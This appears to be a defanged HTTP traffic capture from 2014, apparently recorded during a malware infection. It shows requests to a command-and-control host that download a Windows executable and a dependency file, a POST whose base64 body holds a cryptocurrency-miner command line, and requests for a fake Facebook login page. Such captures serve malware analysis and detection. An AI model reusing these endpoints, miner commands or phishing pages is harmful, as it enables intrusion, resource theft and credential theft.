{.3..r..y...u....).=P.....^.Hdf.....L.*.g._]...?.....w.0.5..*.h.}x0(....Y"@,.mS@....z.5c..............( *K~...4.3V5.....&.3.....d...*G...........4.......n..V,.@.i..(8....Q......=`r......kJ.5.C......... .. ....t.;*mDk..x8w...7jR.B#.e..[....Y..*.a.he.m.%.7V.....J.n...5..WK@..s...d..1..........c_-..T.Iz..n..Q..[zZ...~.(n8cz.8.Mo.........S<..Q...G...O. ........,B9.-......h..!Va5N.^.*.g7....'......%..\..yw.PF\.@...D..f#..8....&e._]u.\.E.....[,...GP.A...-\ ..[.rB...9.*!`.-...".......t8...^.B^....zOJ;.p.!.v>2....d;..f....J.F>YsYF....q.[...`#..&F....6..D.D v h..&h.y.......h..7..w...y.fK{.......%h..h.....>%KOt...7k\c.h..u.4. 3.......|..Jo.IG.Z.{.nb.o.X...k,.....Y(-`.F...J.Z5.../.jE....x2.

<<< skipped >>>

GET /_images/header_refer.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 986

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-3da"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...|IDATx..V]HSa.......t.X...?.5.7rW..#.......e.A....W]t.H.].r... .........h....3.v.N..#...9.b.<....;......A.4.4..s...@...q. .Z..p...r.!..5.x...E......B...g..2.V...1..<...OFGG.UUU-.K.../.9...I$....0J.RR.P.......P..j%..h...-{.@"B..Z.V3;;k...v......d.#..MMM.....\.G.-.H...Ph........m6.k...<t.......|>_...F...c; ... ..).......z...= &.b..G.........c9...@l.q..h..........V...@B...?\.a.g.Yy....d...5.(.tsPs..r}g...!fH.}......E".W*...:.r.\..3".}aL.T.@......F.....A...Y....6q..h........H4 N....L0.D...S,..>0....;w...d.k0.Lxf1<..w..;.sr..]b..x............*...1..r. .^.......A.y...:,...XYY.......V.8. ...].....5..T...!......z.A...I.q...t:.......@._....Gi..V;........444.....=m<..B..0".E[...a...t....nGG......###.1.....?-//o........-..].....{..G..|>...8.i`..a.U...........J...u...m? .g..$tu.$.b...`0hu...333.D$`.d.@...bqjll.*&..}W.,...lF..~.5......!...P. ...H.......pd..c.?.z*.s,.L.8.....= ..I;P.U\q..r.....$a....R.....IEND.B`.....

GET /_images/home/home_gradient_01.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 292

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-124"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR.......%......=.J....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...m..0...y2..9es*..........M1..=..F..h f.o.=&-~?i...(......G.N.B.._^..M<.o`q..L9W...%2......4}......g.u...O......?^.g../z.....o.I.wg&V.\...".p...?*^Y..^/.`..2{.......^......s.4c...w.>z.sa./...v...'4W.....IEND.B`.....

GET /_images/home/home_gradient_02.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 193

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-c1"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR.......T......4......tEXtSoftware.Adobe ImageReadyq.e<...cIDATx.b.Zs.....L...................?.........GfC......a.......P.M.................H......'.......`.zlb..r{.....IEND.B`...

GET /_js/jquery-ui.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 90088

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-15fe8"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

/*!. * jQuery UI 1.8.16. *. * Copyright 2011, AUTHORS.txt (hXXp://jqueryui.com/about). * Dual licensed under the MIT or GPL Version 2 licenses.. * hXXp://jquery.org/license. *. * hXXp://docs.jquery.com/UI. */.(function(c,j){function k(a,b){var d=a.nodeName.toLowerCase();if("area"===d){b=a.parentNode;d=b.name;if(!a.href||!d||b.nodeName.toLowerCase()!=="map")return false;a=c("img[usemap=#" d "]")[0];return!!a&&l(a)}return(/input|select|textarea|button|object/.test(d)?!a.disabled:"a"==d?a.href||b:b)&&l(a)}function l(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.16",.keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,NUMPAD_SUBTRACT:109,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SHIFT:16,SPACE:32,TAB:9,UP:38,WINDOWS:91}});c.fn.extend({propAttr:c.fn.prop||c.fn.attr,_focus:c.fn.focus,focus:function(a,b){return typeof a==="number"?this.each(function(){var d=.this;setTimeout(function(){c(d).focus();b&&b.call(d)},a)}):this._focus.apply(this,arguments)},scrollParent:function(){var a;a=c.browser.msie&&/(static|relative)/.test(this.css("position"))||/absolute/.test(this.css("position"))?this.parents().filter(function(){return/(relative|absolute|fixed)/.tes

<<< skipped >>>

GET /_images/ico_24_sharelink.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1569

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-621"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:0DBC3EDDE30D11E1B1D2E3CE95056E0B" xmpMM:InstanceID="xmp.iid:0DBC3EDCE30D11E1B1D2E3CE95056E0B" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:DerivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" stRef:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......dIDATx..U=.ZA..O.*X.....".XH..%..........2?!.j...J,..VV.*...),D..ET.z....YV........ef..9g....q..x.&.Wn.>....8..v.4...C......*..R.f..a..lv....2.Nb..O\{G.p.q.w..=....d.X.m:...xL...#..z$.._$9..(..X.Vd.^...l6#.....CF.\..=D".`$..8i.`.).;.(.v.._.E............?`.@N$..V^2.<.=.).\...B.x.FJ..z.m*...`L...g..e...3 .S.....$.......M.P.....Z.....F...@..B*.b>...../.v..n._M....t.P.....s...2...T*.z.,d..TE......._MP,...h..@...$...0..`.X..lB$..~..v...N'.Z.......r..j...C...Q.....x<.p...G....h......r.R.M..(.e8.....Q..M....:..p..f"*DD...fS.r9Y!....

<<< skipped >>>

GET /_images/logo/fileswap_large.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 11897

Last-Modified: Tue, 18 Sep 2012 15:38:12 GMT

Connection: keep-alive

ETag: "50589564-2e79"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR.......<.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}.|....3...=r....%..K...YN..D....V.....P..R[/....Bm..|...UD.P.D.hU.."!$!..f.s..........n8......dg.{~............._M%......P8s..$.......P..3`(C.7......;...'.........B...h:Q.jT......f.,...8Y![..&......n.33.p.......|>..L>yOf.v.I..7..8...j.\..G?..-...~..K..S.N..-.M&..a._Z,.....`....Df..a.@.l...~.[0.R.z....2.l..p&..C$6.2.w..7a.{.......|..3l....P4...w.{.?W^2(.o..D.g1...............8p.........55J..#-..zS..#.P..'V.M\..V...@..q,.gA ]sn1.2.F...m.........h.G.]...|...l........ .TF__.^...f..c.um.!.*)...@7`..0.d..?.=........x.j.z.K.UZ...FRYd .V-_...&w_;..5zU...vo.7:.@... ..[>6'E......).>.T#1b.F.xi.@..Wr_..|.... U)..x.}.......0.........d...a%.....Xe!c........R..:......{.zq.R]6.:C.....`..t:.b....Hggg..,..'B3U.ikk#..<..$....!i.o......U.G >..i....rem1...3.X.@^....{Q).`...a{..... ....~.... v...j.Z..=.......^.<E.....q........Q.]...v.I..0H..h.].d.8...>.)....4.....x...S.X5@;....&..PI.... .....e,].....J.....<Y... ........^...Epy.f..n.Y.j.......'..{:..O{....[.....]r.(.j.).huI.....A..G....#.....f3'....X..q2e.....j.~...Ak...;....5Lj.R.2.B=.f.._.vd..19.u1...s.O&-.{.....G...O.J...GO..v.p\.,?.......~.s.|...Dn...X.j....-.~.!.>. }.....;...`.R.*l:Z......z.p......T......z...O.^.D...^..7d.r.../.*J.A....RWhG-\....}-.%...~....`0(....s|k$*o6......Q..=.m.e....jc.-.0.........&.5.I`.n..=K.|...J..47e!^..Kp....#>&2...<.|..%...%..A...t......f....7.-e.i..~...j0u.1lu..wY..%,Cn.........."S B...UP.kP*...w...[&TY..3*.F.dM..%H...ih...Z...

<<< skipped >>>

GET /_images/home/home_upload_button.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 34227

Last-Modified: Mon, 17 Sep 2012 17:52:51 GMT

Connection: keep-alive

ETag: "50576373-85b3"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR.......x.............tEXtSoftware.Adobe ImageReadyq.e<...UIDATx.....%E.6.T.8yv.....9GvI.d%.(.....(A./.J.U..I..Y........"a.X.e...ff'..............."...W/.......9.9.N.J).x......oB]H.9.....%ob[F...6P..:e..S.<..&.\P.I4.T.&:.....4........6X.M..Tu...!`....h...j...-......a...q&e.$..$...7. I..S..#...IH..[.7CYP........T.....z..>.....0.......A.W..G2... ...|.u..~... ..^...."6.o.z...D"!.?..app..K/..z.3n....* ..D".....q.%..T.`u.j..:nQ.'..7.|eEE....t....g...V,...n.V.!.J......z.....[...p.!..-%fhh...}.so...{......F....f.z.......X?.!.LJ.......I..u..wX..!...W&...9....Z#.&.:.r.....|E.....o~s%....x.S.ByV...O...?.F1....`..l,.:.,."......u......Z....^']p..O.....l>........d.X.|?.b.. ...X.......k,|.'...4...2k...o....H.w...H.......e../...[.I.2J..6..7|.._.^&x..K^...J.5.....ym.m&........1.7.x.%g.R.....lT.....7r.~......_...2..k_...Au`2.P.z&'..:\{..._ ..._...UUUW..`.f7{..l..... ..mI^u.U.uuu.g...===._.....~...qu.p.B[.....ve..z..~O..~C....../....... .p.W.u .~.#{.....$').N[(.....k..?./G...=E..u.#.u8.U.....F.N.P.........TE?... ..p.7.LW}V.....xH....T...~8%`><.&...9..p.....Yn../...WE.E9.!_n..\H." #H.Y..:..Wi..X.E....z.......C...X{f...j..........{.ny.............a....$.....q..=9m..IG.yd.C.v.5....0M..}t.D....{....^.i..u:.#]ju.Tf./D5>"aU....)..:..2..-js.}.....G.q.....C....D..S.r.RN.P..P.!.......C.y.s...E.(>...^................:O.........;.}...[.%y.3..r&...8.Y...6..tAP.....-;...`...e ...3)G.He.,......T..~.H..9....."..%.kt...cF..J*?.B....0..... ...dX...^Q......R..>g$.e...l.-..k....$o.........c.9... Og... ...

<<< skipped >>>

GET /_images/home/home_upload_02.jpg HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/jpeg

Content-Length: 25736

Last-Modified: Wed, 12 Sep 2012 22:41:27 GMT

Connection: keep-alive

ETag: "50510f97-6488"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

......Exif..II*.................Ducky.......P.....&Adobe.d.................../...G...d............................................................................................................................................................................................................................................. 0@.!3..P1"2..`#CD.AB$4%5.........................!.01A2...Qaq.."r.3 @.....BR..#.45Pb..s...$..CSc.`..DTU..................... @`!1P.0.."AQa2....................!1AQaq.0@.... ...P..`..p............................................................................................................................................................................................................................................................................................................................<=...................................>O..................................................2.............P...........e@......................(.............J.....'/D......f6.......V...O...........N..............................r@..........J.#.s..~.........xs...8..=5.. .V......`.u.......|..."...z................E%.....L..f4...*............#...|.j....u..7./..|~....)(...x...._.e.F.."...Z..X....Z..G@|..H..kn...6:........@..2.W.....!,......S.x.'fiE..`.3...2.]........`...................z_...W..~.Z....D%......\..|.._...5."..N2.?D..C.....g.........<..2.o.Q.<.........../ ...P..M%...2`...,...}f.W.9..2]zK..%....[..a..>g_.....L.......[......>...v.{....Dj_.-@...!.....~..9.O5Zb...V...t.....z....V.3....

<<< skipped >>>

GET /forum/search.php?method=dep&noxor&file=purple.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:46 GMT

Content-Type: text/html

Age: 0

Server: YTS/1.20.28

..}.bG...C....j.&7 $..._.....!..purple.zip.................................. ;."&{.|....G.qa.s."skS .&s.........w>....)l*...q.h....u..D.....pb..........s........1...nkd..[.c.lP....t.q1.5y..4.Ld.-....U.S/....9aY.@....AX.S.j...........{1>.L...B..ci.\.N.....~.pS.9.K...#._...:.t<....b..*..<....S.W...p........q"..w...L.S ....mC...D...'...h%n_.cA..g...3..Z.R.Z..y.`..8...7P....c..:.........naxV.Vc.f.....F.N.....f^@.!y9...........g....F#Q84k.-=.n.v...M....... !wdW.I....*.\.~7H'?..l.{....ts.Um5=w..8-^}{.6'u.e%(?Cnb.....K.xAbGe.}..:?.G...@.,.~.....*.....`..F.......^.g..m.F @.p..3.q/.#..H....D......|......../..q&...F.....59.C...?.........g'.U]i.`...d..[[Nd..!..8......Tgr.c...A6T..../."......T..B.G!...d.|u..=\1T9.|.l.q./Y$A.P....u...'.....#Ri.A$@..=.M>.U..._.?..2...*.7..q.o.!......*.A...E..S..=_.U..?o........>.M-.m.......xS.....&T......@..C)5.$[..r..>...=2<.".L.1.l..~.y..0....d.z..SAWy.......I.....?@........o...."x...~...%%u..W.n...i._..g.lC../..W:c"s.9. X.....wWi.b....a..&...(.o,..-o...C....z.y.oE!.r.>...*..BZ.(..=..6.ieJl...,8..0.yK.23d..h.Z.I....D.\..!n..T.@v. ).....R.........A....6.n"\....5.............

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b528200 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:36 GMT

Content-Type: text/html

Age: 2

Server: YTS/1.20.28

304....S........wellshirt.net.........B..,...Lz.h5#......P;..F2..9!..%Lm...p.D=4a;.{?~a....j....|.7...#..GB..H.9,N.g.].M....f)..M...Q..w..:ps......@x(b......0...Si..0YV..A.K.).x.$..>.2...M.T5..Z...5.MJ8..$.........1....F../UW...h...4.... ..3k..z.}....Kk.{..Dry.... .._Z.H...&....w..d?.q.4.~.....5Fu...{..L..........Y..'qG...O...R.:........>.......G.*..].P0../..x.<..[&~.5... ..e?.C..@...,c....|....z....\P..~:.......M.3.j.....N..OK.J.........]_`..Je^...z..R. ."...2.].@8 ..b@.'........8O.........1W ....>\...A....O(LF..a()N Y.m.Dh..q!h#.K....yd?B.J.....)J..V.BL.P.. .....Y...H.x...$@....u....3;. p..*g;.bS......q\.....j.0.//.vJ.:..=n.)=.~F.eg..S7..".>.....Mg^..'.B... .@..X........."....)..r............'...g.a.b.gK.B/}p..p... d:\.1..bD...>j/.w..8.V1UH..[.C:../Df.4hc............lm..3.$...I......#...B..sP.P".,.2.|. 5...l.....E..A.....`M.7..zt.....1*.._...?X..c\-......Q.s .....J'.........q9....N.......V..-?..:.^.{K=E^/|...p.z.V....\..k. .^...$....B........>..S.xTzQ.`..K....n3..y..h..e..gK...a...j#....W...L..icw.~.!..N,.....2..h..r;F..V....*.%.Ft...i..`E.=......3...?.b....&. .......t8..4.....`~.>..xD.(..iC....w.;.8..t...O.....\D........Y...Ba.b...yp..a.j0.".s..;TG...8..&..Py].VY..Z........;<...Qn......._....\.............e5U..f....2..Ay.s...

<<< skipped >>>

POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 265

data=c3Bhd25lZDogJ3dpbjMybXJvY2xpMi5leGUgLWEgY3J5cHRvbmlnaHQgLWEgY3J5cHRvbmlnaHQgLW8gc3RyYXR1bSt0Y3A6Ly9taW5pbi5nczoxNzc3NyAtdSAxVkpydWV4WnpYdVJvczF0V2l4Q3FRNFA3Tlc4VjdxR0NZS3VSYnpYY0p6MmlpeGlTemJ6ODM3U1I0aEpCWlBvUWoxaUp0YmVLVHJlazJiWE50dEY2ZGdBTjZCampieCAtcCB4Jw0K

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:47 GMT

Content-Type: text/html

Age: 2

Server: YTS/1.20.28

.............

GET /fb_login/index_files/-PAXP-deijE.gif?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 43

Content-Type: image/gif

Age: 0

Connection: close

Server: YTS/1.20.28

GIF89a......./alok.!.......,...........D..;..

GET /fb_login/index_files/276449379149296_1535348985.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 741

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28

.PNG........IHDR...0... .....>.......IDATh.c...?.>...h3..#.>5.).B.r=5.._...FH.@.3..........Hy..`b..g .H.n.I....5>..b..7L.......0;...L!...d......3.[.X|3...:..&...1bgw.W....,Z*.O.|....PwK.~ {.x..../..#<..df.%...7s.~..t....8.t/.&.3....A..A. '...g#.0.=@r..U......!..<..=....:..|.:..:J...!......t.z.F.K..C>.H..p...5$.AH.B.=0Z.S....G^.@..\|\y..zb.....y.X...W.|.... 9..Tx.cKF...L...1Z.K.6....tl.DVO..XY.$.......W.c.h\......@.G....? ..g...`...`.T..|.....R......p...5$.."Q#...W.K.?F...!E u.I....p1.....b.d.. ..e..&.$..2c...._>..........S~.y....7MF.W.&7.h..6.&..q.d.122(...c..f.......r..-#! .b./....GL.~..7..x9...`s,6.. ..1I..v....sr..L.`.0..$D..M...0B'.C?..9...''O_zr.....v^.....d.\,.My...a..................7Hp0..h1....h6. .........6...f....IEND.B`...

GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: text/html

Age: 0

Server: YTS/1.20.28

..........................

GET /fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 49960

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364176131,178142495*/...._24n .body ._24x{color:#333}.._6nw ._24n .body ._24x{color:#4e5665}.._24n .body ._24x:hover{text-decoration:none}.._24n .body a.signature{color:#3b5998;display:inline}.._24n .body a.signature:hover{text-decoration:underline}.._24n .hover:hover .title ._24x{text-decoration:underline}.._24n .forceRTL{direction:rtl;text-align:right;display:block}.._24n .forceLTR{direction:ltr;text-align:left;display:block}.._24n .adInfo a.identity{color:gray;display:block;white-space:nowrap}.._6nw ._24n .adInfo a.identity{color:#898f9c}.._24n .title{font-weight:bold;margin-bottom:0 !important}.._24n .image_body_block{padding-top:3px}.._24n .uiUfi{width:auto}.._24n .fbEmuHidePoll .otherdiv .other{width:206px}.._24n .ads_rhc_close{opacity:0}.._24n:hover .old_x, ._24n:hover .uiSelectorButton, ._24n:hover .ads_rhc_close, ._24n .ads_rhc_close.openToggler, .emu_x .openToggler .uiSelectorButton{opacity:1}..fbEmuHidePoll .undo{float:right;padding-left:2px;padding-bottom:2px;margin-bottom:3px;margin-left:5px}..fbEmuHidePoll .fbEmuXTitle{font-weight:bold}..fbEmuHidePoll .fbEmuXSubtitle{margin-bottom:10px}..fbEmuHideThanks .fbEmuXThanksTitle{font-weight:bold;margin-bottom:10px}..fbEmuBlock .fbEmuHidePoll .otherdiv{margin-left:20px}..emu_x{float:right}..emu_x .uiSelectorButton{opacity:0}..old_x{opacity:0}..fbEmuMainBody .firstPassiveName{font-weight:bold}..fbEmuPremium .fbEmuStreamAttachment{margin-bottom:3px}..fbEmuStreamStory .fbEmuStreamAttachment.fbEmuStreamOGAction{border-top:1px solid #e5e7eb;border-bottom:1p

<<< skipped >>>

GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

Content-Type: text/html

Age: 0

Server: YTS/1.20.28

..........................

GET /forum/search.php?method=dep&noxor&file=exefile&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:56:08 GMT

Content-Type: text/html

Age: 2

Server: YTS/1.20.28

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'c./c..|c..|c..|.M.|`..|}P.|{..|}P.|...|D..|d..|c..|...|}P.|Y..|}P.|b..|Richc..|................PE..L....|pS..........................................@.......................................................................... ..P.......................................................................@.......................`....................text... ........................... ..`.rdata...9.......:..................@..@.data........0...r..................@.....................................................................................................................................................................................................................................................................................................................................................................................................................................................8.A..I........V....8.A..6....D$..t.V..........^................L$..T$.V.t$.W...r...;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. ...._...^._3.^..................3.f..$.\$...$..$SU.D$.V.t$(....L$(....D$(..W.....vC..T$...sC.....>..T$,....D$,.l$..D$,....D$,.........vC..........vC..l$...Az<...vC......vC...@vC..L$,.D$,...vC....sC..T$,.D$,.........sC.......t$(.\$..........l$..\$..D$..%X.A..%P.A.......N.f.D$. .3...~(................N..,..,..N.@ ....;.|.....-8uC...DqC...8uC

<<< skipped >>>

GET /fb_login/index_files/276449379149296_367648155.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 3600

